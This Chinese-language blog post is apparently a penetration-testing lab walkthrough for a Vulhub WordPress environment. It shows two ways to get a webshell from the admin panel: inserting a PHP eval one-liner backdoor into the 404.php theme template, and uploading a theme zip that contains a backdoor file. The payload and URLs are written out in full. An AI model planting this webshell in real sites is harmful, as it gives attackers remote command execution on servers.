当前位置: 首页 > news >正文

常⻅CMS漏洞之一:WordPress

WordPress是⼀个以PHP和MySQL为平台的⾃由开源的博客软件和内容管理系统。WordPress具有插件架构和模板系统。截⾄2018年4⽉,排名前1000万的⽹站中超过30.6%使⽤WordPress。

WordPress是最受欢迎的⽹站 内容管理系统。全球有⼤约30%的⽹站(7亿5000个)都是使⽤WordPress架设⽹站的。WordPress是⽬前 因特⽹上最流⾏的博客系统。WordPress在最著名的⽹络发布阶段中脱颖⽽出。如今,它被使⽤在超过7000万个站点上。

姿势一:后台修改模板拿WebShell

1.在宝塔界面进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装好....

#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://166.108.234.191:8080/wp-admin/

2.修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击 【外观】 --》 【编辑】 -》 404.php

3.在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮

<?php eval($_POST[cmd]);?>

5.访问以下连接即可获取WebShell..

http://166.108.234.191:8080/wp-content/themes/twentyfifteen/404.php

姿势⼆:上传主题拿WebShell

1.将带有phponfp();的⽂件加⼊到主题中并将主题压缩为ZIP⽂件...点击 【外观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】

2.安装成功后访问主题下的⽹站后⻔⽂件

http://166.108.234.191:8080/wp-content/themes/qzdy-master/6.php

相关文章:

  • 【C++】priority_queue的使用及模拟实现(含仿函数介绍)
  • v-form标签里的:rules有什么作用。如何定义。
  • Microsoft Edge浏览器的取证分析(基于Chromium)
  • CSGHub开源版本v1.5.0更新
  • Vulnhub靶场matrix-breakout-2-morpheus攻略
  • 在springboot3.x中使用Ehcache3.x
  • 网络编程之客户端通过服务器与另外一个客户端交流
  • oracle删除表中重复数据
  • 正则表达式与拓展正则简单理解
  • LeetCode[93] 复原 IP 地址
  • Mimikyu综合靶场训练
  • 大数据学习(74)-Hue元数据
  • Python标准库之os模块常用方法
  • Excel Script Lab学习笔记
  • Pytorch使用手册(专题五十)—自定义运算符
  • 《Python深度学习》第三讲:神经网络
  • sqlite mmap
  • nginx配置反向代理数据库等插件的原理和方式
  • Java线程6种状态的详细说明、状态转换关系(UML展示)
  • 汽车安全确认等级-中国等保
  • 网站设计的主要机构有哪些?/互联网营销师报名入口
  • jsp做网站教程/优化培训内容
  • 杭州网站改版公司电话/人工智能培训师
  • 临沂网站建设教程/单页网站怎么优化
  • 网站建设合同 完整版/东莞网站建设市场
  • 怎样开网店流程视频/深圳百度搜索排名优化